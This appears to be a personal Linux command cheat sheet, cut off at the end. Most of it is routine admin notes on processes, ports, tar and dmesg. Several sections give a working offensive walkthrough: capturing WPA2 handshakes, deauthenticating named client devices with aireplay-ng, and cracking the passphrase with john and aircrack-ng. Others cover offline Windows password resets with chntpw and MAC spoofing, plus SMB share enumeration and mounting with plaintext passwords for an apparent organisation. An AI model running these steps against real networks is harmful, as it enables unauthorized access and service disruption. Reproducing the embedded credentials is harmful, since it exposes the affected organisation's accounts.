$ tcpdump -nni wlp2s0 -v -w ~/"capture_.date '+%Y-%m-%d_%H:%M:%S'..pcap"
Switch back to Managed mode:
$ sudo iwconfig wlp2s0 mode Managed
Switch NetworkManager back on:
---[Tarballs]--- (top)
$ tar -czvf name-of-archive.tgz /path/to/directory-or-file
Extract a tarball into the current directory
$ tar -xvf archive.tar
Extract a tar gz file (.tar.gz or .tgz) into the /tmp directory
$ tar -xzvf archive.tar.gz -C /tmp
---[Working with processes]--- (top)
List running processes
$ ps aux
Listing the fill process tree and explore it with less allowing searching
$ sudo systemctl status
Get the PID of a process
$ pidof systemd
To kill a running process
$ kill PID
Resources:
---[ANSI timecode format]--- (top)
---[rfkill]--- (top)
rfkill command
Interfaces can be put into hard or soft blocking.
# rfkill list 0: dell-rbtn: Wireless LAN Soft blocked: no Hard blocked: no 1: phy0: Wireless LAN Soft blocked: yes Hard blocked: no 2: hci0: Bluetooth Soft blocked: no Hard blocked: no # rfkill unblock wifi # rfkill ID TYPE DEVICE SOFT HARD 0 wlan dell-rbtn unblocked unblocked 1 wlan phy0 unblocked unblocked 2 bluetooth hci0 unblocked unblocked # rfkill list 0: dell-rbtn: Wireless LAN Soft blocked: no Hard blocked: no 1: phy0: Wireless LAN Soft blocked: no Hard blocked: no 2: hci0: Bluetooth Soft blocked: no Hard blocked: no
Sometimes even through wlan0 is no longer blocked, you will still need to bring it up with the ip command. And in Kali, you may need to go to pull-down and turn wifi on if it is flagged as off.
# ip link set wlan0 up
---[dmesg]--- (top)
From # dmesg --help
-f, --facility (list) restrict output to defined facilities -H, --human human readable output (piped through less) -x, --decode decode facility and level to readable string -l, --level (list) restrict output to defined levels Supported log facilities: kern - kernel messages user - random user-level messages mail - mail system daemon - system daemons auth - security/authorization messages syslog - messages generated internally by syslogd lpr - line printer subsystem news - network news subsystem Supported log levels (priorities): emerg - system is unusable alert - action must be taken immediately crit - critical conditions err - error conditions warn - warning conditions notice - normal but significant condition info - informational debug - debug-level messages
This will list only kernel level messages
# dmesg -f kern
This will list only warning level messages
# dmesg -l warn
This will list the messages in human readable format and pipe through less.
# dmesg -H
# dmesg -x
And of course you can pipe the output of dmesg to grep specific string(s).
# dmesg | grep -i wlan0
---[Monitoring open ports]--- (top)
$ whatis netstat . (8) - Print network connections, routing tables, interface statisti...
$ watch netstat -tanp
$ sudo netstat -atnp | grep ESTABLISHED | $ sudo netstat -atnp | grep ESTABLISHED | awk '{printf "%-25s %-10s %-25s %-20s\n",$7,$1,$4,$5}' | sed /^-/d | sed 's/\// /g'
This include all local connections
sudo netstat -atnp | grep "ESTABLISHED\|LISTEN" | awk '{printf "%-25s %-10s %-25s %-20s\n",$7,$1,$4,$5}' | sed /^-/d | sed 's/\// /g'
Check a specific pid
ls -l /proc/1138/exe
Netstat is considered depreciated, and ss has replaced it.
$ sudo ss -tulpn
Find out the processes PID that opened tcp port 7000, enter:
# fuser 7000/tcp
Find out process name associated with PID # 3813, enter:
# ls -l /proc/3813/exe
To find out current working directory of a process called bittorrent or pid 3813, enter:
# ls -l /proc/3813/cwd
or use pwdx command, enter:
# pwdx 3813
Use the following command to find out the owner of a process PID called 3813:
# ps aux | grep 3813
# ps aux | grep '[3]813'
https://www.cyberciti.biz/faq/what-process-has-open-linux-port/
You can also use ss for a nice clean list of bound ports.
# sudo ss -tulpn netstat -a | more : To show both listening and non-listening sockets. netstat -pt : To display the PID and program names. netstat -at : To list all tcp ports. netstat -l : To list only the listening ports. netstat -s : To list the statistics for all ports. netstat -c : To print the netstat information continuously. netstat --verbose : To get the non-supportive address families in the system. netstat -r : To get the kernel routing information. netstat -ap | grep ssh : To get the port on which a program is running. netstat -an | grep ':80' : To get the process which is using the given port. netstat -i : To get the list of network interfaces. netstat -ie : To display extended information on the interfaces
---[CCCC Examples]--- (top)
First, identify the available shares
enum4linux -S -u "CCCCStaff" -p "CapCity2014" 10.32.10.3 Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share D$ Disk Default share E$ Disk Default share IPC$ IPC Remote IPC S$ Disk Default share Staff Drive Disk
enum4linux -S -u "CCCCStaff" -p "CapCity2014" 10.32.10.4 Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share E$ Disk Default share F$ Disk Default share G$ Disk Default share H$ Disk Default share IPC$ IPC Remote IPC K$ Disk Default share Kiosk Disk Media G Disk Bios lists as 00:04 - in slot 5 - installed 02/23/2014 Media H Disk Bios lists as 00:05 - in slot 6 - 2TB drive installed on 02/23/2014 Users Disk
Next, mount a share
sudo mount -t cifs '\\10.32.10.3\Staff Drive' /media/ben/staff -o username=CCCCStaff,password="CapCity2014" mount -t cifs //10.32.10.3/ /media/ben/staff -o username=Customware,password="ADMcc1188"
You can also use the following to open a terminal like session with a share.
# smbclient //10.32.10.3/C$ -U CCCCStaff
---[chntpw]--- (top)
Changing the password of any account in Windows 7/8/9/10 - offline.
Now copy all the extracted contents to your USB drive’s root. h:\syslinux.exe -ma h: Note: The “h” in the above command will be replaced by the actual name of your USB drive This is it! You now have a live chntpw USB that is ready to be booted with! https://appuals.com/create-a-password-reset-disk-using-chntpw/ Windows 10 https://www.top-password.com/knowledge/reset-windows-10-password-with-ubuntu.html Once the key is created shut-down the Windows PC, insert the thumb drive if the USB key was created on another computer, and turn on the PC — be sure to boot from the USB drive. Once the live media boots, select “Try Fedora” and open the Terminal application. Also, we need to mount the Windows drive to access the files. Enter the following command to view all drive partitions with an NTFS filesystem: Once the drive is mounted, navigate to the location of the SAM file and verify that it’s there: $ cd /mnt/Windows/System32/config $ ls | grep SAM SAM SAM.LOG1 SAM.LOG2 Use the -l parameter to display a list of users it reads from the SAM file: $ sudo chntpw -l SAM Now that we have a list of Windows users we can edit the account. Use the -u parameter followed by the username and the name of the SAM file. For this example, edit the sysadm account: $ sudo chntpw -u sysadm SAM Verify the change by repeating: $ sudo chntpw -l SAM https://fedoramagazine.org/modifying-windows-local-accounts-with-fedora-and-chntpw/
---[What app is bound to a port]--- (top)
To find out which process is actually listening on that port you can use the following:
$ sudo fuser -v 631/tcp USER PID ACCESS COMMAND 631/tcp: root 859 F.... cupsd $ sudo fuser -v 53/tcp USER PID ACCESS COMMAND 53/tcp: systemd-resolve 795 F.... systemd-resolve $ sudo fuser -v 445/tcp USER PID ACCESS COMMAND 445/tcp: root 1303 F.... smbd $ sudo fuser -v 80/tcp USER PID ACCESS COMMAND 80/tcp: root 948 F.... apache2 www-data 2626 F.... apache2 www-data 2627 F.... apache2
---[macchanger]--- (top)
Display current MAC address
$ ifconfig wlp2s0 wlp2s0: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 1500 inet 192.168.2.8 netmask 255.255.255.0 broadcast 192.168.2.255 inet6 fe80::2f2d:8b0a:e776:d86a prefixlen 64 scopeid 0x20 ether fc:f8:ae:26:86:ee txqueuelen 1000 (Ethernet) RX packets 2132514 bytes 2986638501 (2.9 GB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 894539 bytes 114997888 (114.9 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
$ macchanger -s wlp2s0 Current MAC: fc:f8:ae:26:86:ee (Intel Corporate) Permanent MAC: fc:f8:ae:26:86:ee (Intel Corporate)
Take the interface down
$ sudo ifconfig wlp2s0 down
Change the MAC address to a random address
$ sudo macchanger -A wlp2s0 Current MAC: fc:f8:ae:26:86:ee (Intel Corporate) Permanent MAC: fc:f8:ae:26:86:ee (Intel Corporate) New MAC: dc:fa:d5:6e:f6:04 (STRONG Ges.m.b.H.)
$ sudo macchanger -A wlp2s0 Current MAC: dc:fa:d5:6e:f6:04 (STRONG Ges.m.b.H.) Permanent MAC: fc:f8:ae:26:86:ee (Intel Corporate) New MAC: 00:02:25:5d:cc:5c (One Stop Systems)
Bring the interface back up
$ sudo ifconfig wlp2s0 up
Display the new MAC address
$ ifconfig wlp2s0 wlp2s0: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 1500 inet 192.168.2.8 netmask 255.255.255.0 broadcast 192.168.2.255 ether 00:02:25:5d:cc:5c txqueuelen 1000 (Ethernet) RX packets 2137209 bytes 2993237477 (2.9 GB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 896368 bytes 115192210 (115.1 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Take the interface back down
Reset the interface to the original MAC address
$ sudo macchanger -p wlp2s0 Current MAC: 00:02:25:5d:cc:5c (One Stop Systems) Permanent MAC: fc:f8:ae:26:86:ee (Intel Corporate) New MAC: fc:f8:ae:26:86:ee (Intel Corporate)
Display the current MAC address
$ ifconfig wlp2s0 wlp2s0: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 1500 inet 192.168.2.8 netmask 255.255.255.0 broadcast 192.168.2.255 ether fc:f8:ae:26:86:ee txqueuelen 1000 (Ethernet) RX packets 2137286 bytes 2993241355 (2.9 GB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 896384 bytes 115195018 (115.1 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
---[Cracking wifi credentials]--- (top)
This section deals with collecting the handshake from a Wifi network and preparing it for cracking.
Display the current wifi interface (wlp2s0 or wlan0 are the build-in wifi, and wlx00c0ca8f2b07 is my external wifi interface). Note that they are in 'managed' mode and not associated with an AP.
$ iwconfig wlp2s0 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Retry short limit:7 RTS thr:off Fragment thr:off Power Management:off wlx00c0ca8f2b07 IEEE 802.11 ESSID:"ATTFJ4Br3A" Mode:Managed Frequency:5.765 GHz Access Point: C6:52:61:97:05:B3 Bit Rate=135 Mb/s Tx-Power=30 dBm Retry short long limit:2 RTS thr:off Fragment thr:off Power Management:on Link Quality=70/70 Signal level=-39 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:93 Missed beacon:0 lo no wireless extensions. eno1 no wireless extensions. And to see other details... $ sudo ifconfig [sudo] password for ben: eno1: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 ether 5c:26:0a:69:40:2a txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 device interrupt 20 memory 0xe2e00000-e2e20000 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 257 bytes 22927 (22.9 KB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 257 bytes 22927 (22.9 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlp2s0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 ether c0:f8:da:79:de:fc txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 device interrupt 17 wlx00c0ca8f2b07: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.1.73 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 fe80::22e9:3a1:c500:28af prefixlen 64 scopeid 0x20<link> ether 00:c0:ca:8f:2b:07 txqueuelen 1000 (Ethernet) RX packets 7613 bytes 10092273 (10.0 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 4172 bytes 424253 (424.2 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Check if there are any potential problem processes
$ sudo airmon-ng check Found 5 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to run 'airmon-ng check kill' PID Name 820 NetworkManager 821 wpa_supplicant 823 avahi-daemon 874 avahi-daemon 11712 dhclient
Kill the problem processes. Make sure to give it some time for them to actually terminate. You might want to run the kill a couple times...
$ sudo airmon-ng check kill Killing these processes: PID Name 821 wpa_supplicant (wait a moment and then...) $ sudo airmon-ng check $
Verify the interface is now reset
$ sudo iwconfig wlp2s0 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=200 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off wlx00c0ca8f2b07 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=30 dBm Retry short long limit:2 RTS thr:off Fragment thr:off Encryption key:off Power Management:on lo no wireless extensions. eno1 no wireless extensions.
Start the new wifi interface (wlp2s0mon)
$ sudo airmon-ng start wlx00c0ca8f2b07 PHY Interface Driver Chipset phy0 wlp2s0 wl Broadcom Inc. and subsidiaries BCM43228 802.11a/b/g/n phy1 wlx00c0ca8f2b07 rt2800usb Ralink Technology, Corp. RT3572 Interface 15mon is too long for linux so it will be renamed to the old style (wlan#) name. (mac80211 monitor mode vif enabled on [phy1]wlan0mon (mac80211 station mode vif disabled for [phy1]wlx00c0ca8f2b07)
Check to verify the interface is set to monitor mode as seen below.
$ sudo iwconfig wlp2s0 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=200 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off lo no wireless extensions. eno1 no wireless extensions. wlan0mon IEEE 802.11 Mode:Monitor Tx-Power=30 dBm Retry short long limit:2 RTS thr:off Fragment thr:off Power Management:off
Launch the capture of available APs and clients. This will run in channal hopping. Let this run until you see the AP ESSID you are interested in, and an active client station associated with that BSSID.
$ sudo airodump-ng wlan0mon CH 6 ][ Elapsed: 4 mins ][ 2019-09-28 15:50 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 2C:99:24:96:2A:11 -1 0 1 0 1 -1 OPN <length: 0> B4:75:0E:25:49:BE -31 179 3215 0 1 54e WPA2 CCMP PSK Private.net DA:31:34:68:77:AF -34 156 1 0 1 54e WPA2 CCMP PSK <length: 0> B0:EE:7B:AF:1E:E5 -50 156 0 0 1 54e WPA2 CCMP PSK <length: 22> 94:8F:CF:75:BE:00 -60 152 69 0 1 54e WPA2 CCMP PSK ATTB2f6CTA A2:17:B8:45:0D:63 -75 130 49 0 1 54e WPA2 CCMP PSK <length: 9> 30:E1:71:B2:B8:66 -76 124 0 0 11 54e WPA2 CCMP PSK DIRECT-65-HP ENVY 451 F4:17:B8:45:0D:62 -76 132 63 0 1 54e WPA2 CCMP PSK ATTB2f6CTA A0:04:60:35:2D:C5 -76 121 0 0 6 54e WPA2 CCMP PSK Serenity F8:2D:C0:D4:82:50 -77 135 79 0 1 54e WPA2 CCMP PSK ATTPSHiJ4I 1C:49:7B:40:18:A9 -78 141 27 0 11 54e WPA2 CCMP PSK Nobility 1E:49:7B:40:18:AA -78 134 16 0 11 54e WPA2 CCMP PSK Peasants 00:D0:2D:B7:51:11 -78 136 0 0 6 54e OPN NewThermostat_B75111 94:8F:CF:1C:94:50 -81 81 37 0 6 54e WPA2 CCMP PSK ATTAG2GTA2 14:91:82:D4:3E:80 -80 0 2 0 5 -1 WPA <length: 0> 2C:30:33:E7:45:7D -81 19 18 0 5 54e WPA2 CCMP PSK belkin.e80_2GEXT F0:99:BF:09:27:7A -81 26 1 0 6 54e WPA2 CCMP PSK miller home 14:91:82:D4:3E:83 -81 8 0 0 5 54e OPN belkin.e80.guests 4C:12:65:77:AC:80 -80 11 2 0 1 54e WPA2 CCMP PSK ATTMaSk44I BC:4D:FB:1A:81:C8 -80 4 0 0 2 54e WPA2 CCMP PSK CGN-81C0 BSSID STATION PWR Rate Lost Frames Probe (not associated) FC:52:8D:76:F6:2C -66 0 - 1 0 17 NETGEAR (not associated) CC:6E:A4:31:91:24 -80 0 - 1 0 2 2C:99:24:96:2A:11 B4:D5:BD:CA:5B:ED -80 0 - 6e 0 6 ARRIS-2A13 B4:75:0E:25:49:BE 00:9D:6B:41:55:B1 -16 0e- 1 6 3166 B4:75:0E:25:49:BE D8:31:34:68:77:AF -36 0e- 0e 0 75 B4:75:0E:25:49:BE 00:12:17:93:AC:AD -60 36e-24e 0 20 B4:75:0E:25:49:BE B0:EE:7B:AF:1E:E3 -48 0e- 0e 0 31 F4:17:B8:45:0D:62 38:1D:D9:05:B8:86 -80 1e- 1 0 10 A0:04:60:35:2D:C5 40:4E:36:81:E8:EA -1 1e- 0 0 8 A0:04:60:35:2D:C5 B0:FC:0D:83:05:F4 -78 1e- 1e 0 5
Next start capturing traffic for the AP with bssid B4:75:0E:25:49:BE on channel 6 and write the traffic to the capture.cap log file using interface wlan0mon. Not that the text in bold will popup once the handshake has been caught.
$ sudo airodump-ng --bssid B4:75:0E:25:49:BE -c 1 -w capture.cap wlan0mon CH 1 ][ Elapsed: 1 min ][ 2019-10-01 10:12 ][ WPA handshake: B4:75:0E:25:49:BE BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID B4:75:0E:25:49:BE -47 0 647 1038 12 1 54e WPA2 CCMP PSK Private.net BSSID STATION PWR Rate Lost Frames Probe B4:75:0E:25:49:BE 00:9D:6B:41:55:B1 -26 0e-24 8 2139 B4:75:0E:25:49:BE 5C:87:9C:7B:3D:6F -33 0e- 0e 0 179 B4:75:0E:25:49:BE D0:13:FD:25:EB:20 -39 0e-24e 1 92 B4:75:0E:25:49:BE D8:31:34:68:77:AF -45 0e- 1e 0 84 B4:75:0E:25:49:BE B0:EE:7B:AF:1E:E3 -68 0e- 0e 0 67 B4:75:0E:25:49:BE 00:12:17:93:AC:AD -71 24e-36e 0 121
From the previous results, find a station that is active (D8:31:34:68:77:AF) on the AP of interest and deauthenticate that station, forcing it to reauthenticate while the previous logging command is still running. Deauthenticate client 5C:87:9C:7B:3D:6F or D8:31:34:68:77:AF
$ sudo aireplay-ng --deauth 0 -a B4:75:0E:25:49:BE -c 5C:87:9C:7B:3D:6F wlp2s0mon 19:17:14 Waiting for beacon frame (BSSID: B4:75:0E:25:49:BE) on channel 1 19:17:15 Sending 64 directed DeAuth. STMAC: [5C:87:9C:7B:3D:6F] [25|63 ACKs] 19:17:16 Sending 64 directed DeAuth. STMAC: [5C:87:9C:7B:3D:6F] [29|69 ACKs] 19:17:16 Sending 64 directed DeAuth. STMAC: [5C:87:9C:7B:3D:6F] [28|67 ACKs] 19:17:17 Sending 64 directed DeAuth. STMAC: [5C:87:9C:7B:3D:6F] [30|65 ACKs] 19:17:17 Sending 64 directed DeAuth. STMAC: [5C:87:9C:7B:3D:6F] [29|69 ACKs] 19:17:18 Sending 64 directed DeAuth. STMAC: [5C:87:9C:7B:3D:6F] [31|65 ACKs] 19:17:18 Sending 64 directed DeAuth. STMAC: [5C:87:9C:7B:3D:6F] [25|55 ACKs] And so on until the handshake is caught, then CTRL+C to stop the deauth attack.
Restart to reset the wifi interface. Note that this does not usually work, and I have to reboot the OS.
$ sudo /etc/init.d/networking restart [ ok ] Restarting networking (via systemctl): networking.service.
Use cowpatty to verify that you have captured a 4-way handshake. Note that you need a newer version than is in the Mint repository. Get the .deb from Ubuntu and install it with the following command.
$ sudo dpkg -i cowpatty_4.8-2_amd64.deb
Now you can run the following examples
$ sudo cowpatty -r test.capture.cap -c
$ sudo cowpatty -r capture.cap-02.cap -c
cowpatty 4.8 - WPA-PSK dictionary attack.
Collected all necessary data to mount crack against WPA2/PSK passphrase.
Also check the cap file for the necessary packets/credentials
$ sudo pyrit -r test.capture.cap analyze
$ pyrit -r capture.cap-06.cap analyze Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora https://github.com/JPaulMora/Pyrit This code is distributed under the GNU General Public License v3+ Parsing file 'capture.cap-06.cap' (1/1)... Parsed 60500 packets (60500 802.11-packets), got 1 AP(s) #1: AccessPoint b4:75:0e:25:49:be ('Private.net'): #1: Station 00:9d:6b:41:55:b1 #2: Station a4:8d:3b:0f:7d:dd #3: Station 00:12:17:93:ac:ad #4: Station d8:31:34:68:77:af, 5 handshake(s): #1: HMAC_SHA1_AES, good*, spread 1 #2: HMAC_SHA1_AES, good*, spread 1 #3: HMAC_SHA1_AES, good*, spread 1 #4: HMAC_SHA1_AES, good*, spread 3125 #5: HMAC_SHA1_AES, good*, spread 3125 #5: Station d0:13:fd:25:eb:20 #6: Station b0:ee:7b:af:1e:e3
Pull the handshake from the capture file. Use tshark as shown below.
The expressions often cited are the following:
eapol || wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x04 eapol || wlan.fc.type_subtype == 0x08 eapol || wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x05
$ tshark -r capture2.cap-01.cap -Y "eapol || wlan.fc.type_subtype == 0x08" -w captured.handshake
Pull the handshake from the capture file manually with WireShark
To filter on just one BSSID also include this filter using that BSSID's MAC, which would give you this filter:
You are looking for the 4 packets that make up the 4-way handshake. Use CTRL+m to select those 4 required packets. Then File/Export Specified Packets... and provide a filename. Export as pcap, and check 'Marked packets only'.
You can then run the following, which will report weither the handshake was actually captured.
$ $ sudo aircrack-ng capture2.cap-01.cap Opening capture2.cap-01.cap Read 9377 packets. # BSSID ESSID Encryption 1 C8:52:61:97:05:B0 ATTFJ4Br3A WPA (1 handshake) Choosing first network as target. Opening capture2.cap-01.cap Please specify a dictionary (option -w). Quitting aircrack-ng...
Then combine john and aircrack-ng to crack the credentials. This way, you can pause and restart a cracking session. Note that this wordlist takes ~11 hours to run.
$ sudo john --wordlist=Hacking/Research/wordlists/wordlist5.txt --session=Wifi.session --rules --stdout | aircrack-ng -b B4:75:0E:25:49:BE capture.cap-06.cap -w -
$ sudo john --wordlist=Hacking/Research/wordlists/wordlist5.txt --session=Wifi.session --rules --stdout | aircrack-ng -b B4:75:0E:25:49:BE Private.net.handshake.pcap -w -
Restore a paused session.
$ sudo john --restore=Wifi.session | aircrack-ng -b B4:75:0E:25:49:BE capture.cap-06.cap -w -
Good References:
Another stab at the aircrack-ng suite. aircrack-ng Read these to get all the details; https://www.mankier.com/8/airodump-ng https://nooblinux.com/crack-wpa-wpa2-wifi-passwords-using-aircrack-ng-kali-linux/ When looking for SIP traffic in Wireshark, you can start with the Display Filter sip. Here are a couple more specific filters. To find a specific type of SIP packet: sip.CSeq.method==REGISTER Sometimes you need to match registration traffic on the server and client (two Wireshark sessions). To see matching traffic, in a SIP Message Header, find a Call-ID on one side, then use a display filter like this on both the server side and client side: sip.Call-ID=="0_1218425253@192.168.15.23" It may be helpful to combine several filters: ip.addr = 162.39.14.21 and sip.CSeq.method==REGISTER and sip.from.user==120 The upper data block shows the access points found: BSSID The MAC address of the AP RXQ Quality of the signal, when locked on a channel PWR Signal strength. Some drivers don't report it Beacons Number of beacon frames received. If you don't have a signal strength you can estimate it by the number of beacons: the more beacons, the better the signal quality Data Number of data frames received CH Channel the AP is operating on MB Speed or AP Mode. 11 is pure 802.11b, 54 pure 802.11g. Values between are a mixture ENC Encryption: OPN: no encryption, WEP: WEP encryption, WPA: WPA or WPA2 encryption, WEP?: WEP or WPA (don't know yet) ESSID The network name. Sometimes hidden The lower data block shows the clients found: BSSID The MAC of the AP this client is associated to STATION The MAC of the client itself PWR Signal strength. Some drivers don't report it Packets Number of data frames received Probes Network names (ESSIDs) this client has probed $ sudo iw dev phy#1 Interface wlan1 ifindex 5 wdev 0x100000001 addr 00:c0:ca:8f:2b:07 type managed txpower 20.00 dBm phy#0 Interface wlan0 ifindex 3 wdev 0x1 addr b0:7d:64:e7:ba:a3 type managed txpower 22.00 dBm multicast TXQ: qsz-byt qsz-pkt flows drops marks overlmt hashcol tx-bytes tx-packets 0 0 0 0 0 0 0 0 0 $ sudo ip link set wlan0 down $ sudo iw wlan0 set monitor none $ sudo ip link set wlan0 up $ ifconfig eth0: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 1500 inet 10.32.10.194 netmask 255.255.255.0 broadcast 10.32.10.255 inet6 fe80::9267:4903:de59:c1e3 prefixlen 64 scopeid 0x20 ether c0:25:a5:16:53:2d txqueuelen 1000 (Ethernet) RX packets 1406538 bytes 1916660178 (1.7 GiB) RX errors 0 dropped 104 overruns 0 frame 0 TX packets 269904 bytes 112351773 (107.1 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 device interrupt 45 base 0xf000 lo: flags=73(UP,LOOPBACK,RUNNING) mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 loop txqueuelen 1000 (Local Loopback) RX packets 287 bytes 20835 (20.3 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 287 bytes 20835 (20.3 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan1: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 1500 unspec 00-C0-CA-8F-2B-07-00-00-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC) RX packets 454 bytes 124082 (121.1 KiB) RX errors 0 dropped 435 overruns 0 frame 0 TX packets 41 bytes 3777 (3.6 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 $ sudo iw dev phy#1 Interface wlan1 ifindex 5 wdev 0x100000001 addr 00:c0:ca:8f:2b:07 type monitor channel 6 (2437 MHz), width: 20 MHz (no HT), center1: 2437 MHz txpower 20.00 dBm phy#0 Interface wlan0 ifindex 3 wdev 0x1 addr b0:7d:64:e7:ba:a3 type managed txpower 22.00 dBm multicast TXQ: qsz-byt qsz-pkt flows drops marks overlmt hashcol tx-bytes tx-packets 0 0 0 0 0 0 0 0 0 $ sudo airmon-ng PHY Interface Driver Chipset phy0 wlan0 iwlwifi Intel Corporation Wi-Fi 6 AX200 (rev 1a) $ sudo airmon-ng start wlan0 [sudo] password for parth: Found 2 processes that could cause trouble. Kill them using 'airmon-ng check kill' before putting the card in monitor mode, they will interfere by changing channels and sometimes putting the interface back in managed mode PID Name 1266 NetworkManager 1493 wpa_supplicant PHY Interface Driver Chipset phy0 wlan0 iwlwifi Intel Corporation Wi-Fi 6 AX200 (rev 1a) (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0) or $ sudo airmon-ng [sudo] password for parth: PHY Interface Driver Chipset phy0 wlan0 iwlwifi Intel Corporation Wi-Fi 6 AX200 (rev 1a) phy1 wlan1 rt2800usb Ralink Technology, Corp. RT3572 $ sudo airmon-ng check kill Killing these processes: PID Name 1493 wpa_supplicant $ sudo airmon-ng check kill $ ifconfig eth0: flags=4099(UP,BROADCAST,MULTICAST) mtu 1500 ether c0:25:a5:16:53:2d txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 device interrupt 45 base 0xf000 wlan0mon: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 1500 unspec B0-7D-64-E7-BA-A3-00-4F-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC) RX packets 66 bytes 13092 (12.7 KiB) RX errors 0 dropped 66 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 $ iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=-2147483648 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:on Note, read the man airodump-ng page! Lots of great info! $ sudo airodump-ng wlan0mon CH 7 ][ Elapsed: 2 mins ][ 2022-05-29 22:28 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 94:8F:CF:75:BE:00 -60 123 185 0 1 195 WPA2 CCMP PSK ATTB2f6CTA BC:A5:11:99:2E:38 -1 245 0 0 6 360 WPA2 CCMP PSK ATTFJ4Br3A_2GEXT C8:C7:50:F5:06:E0 -69 104 71 0 11 195 WPA2 CCMP PSK peasants 24:94:CB:8C:AA:76 -30 104 0 0 1 195 WPA2 CCMP PSK ARRIS-02DD 2C:30:33:E7:45:7D -33 78 0 0 1 130 WPA2 CCMP PSK belkin.e80_2GEXT 94:8F:CF:1C:94:50 -34 15 1 0 1 195 WPA2 CCMP PSK FBI van 38:A0:67:82:D2:44 -33 83 103 0 1 260 WPA2 CCMP PSK ATTg6PWDNg CC:AB:2C:88:75:04 -34 86 7 0 11 260 WPA2 CCMP PSK ATTNYvm2Zc BA:2C:A0:8B:15:63 -34 107 0 0 6 65 OPN NewThermostat_8B1563 EC:C3:02:9B:7A:24 -34 15 7 0 1 260 WPA2 CCMP PSK ATT1 2C:99:24:2D:4D:B9 -36 18 0 0 11 195 WPA2 CCMP PSK ARRIS-4DBB 86:EA:ED:4F:DA:81 -79 82 0 0 1 65 WPA2 CCMP PSK (length: 0) F4:17:B8:45:0D:62 -86 101 186 0 11 130 WPA2 CCMP PSK ATTB2f6CTA A2:17:B8:45:0D:63 -33 100 185 0 11 130 WPA2 CCMP PSK 30:E1:71:B2:B8:66 -89 52 0 0 11 65 WPA2 CCMP PSK DIRECT-65-HP ENVY 4510 C8:52:61:97:05:B0 -126 187 42 0 6 195 WPA2 CCMP PSK ATTFJ4Br3A 5C:E3:0E:94:A1:CC -1 0 0 0 11 -1 (length: 0) 2C:99:24:61:7F:D9 -36 7 0 0 11 195 WPA2 CCMP PSK ARRIS-7FDB BSSID STATION PWR Rate Lost Frames Notes Probes (not associated) A4:8D:3B:0F:7D:DD -53 0 - 1 49 144 Private.net (not associated) FC:52:8D:76:F6:2C -83 0 - 1 0 10 NETGEAR (not associated) 2C:30:33:E7:45:7D -83 0 - 1 58 15 belkin.e80 (not associated) 76:AF:15:76:16:3C -89 0 - 1 0 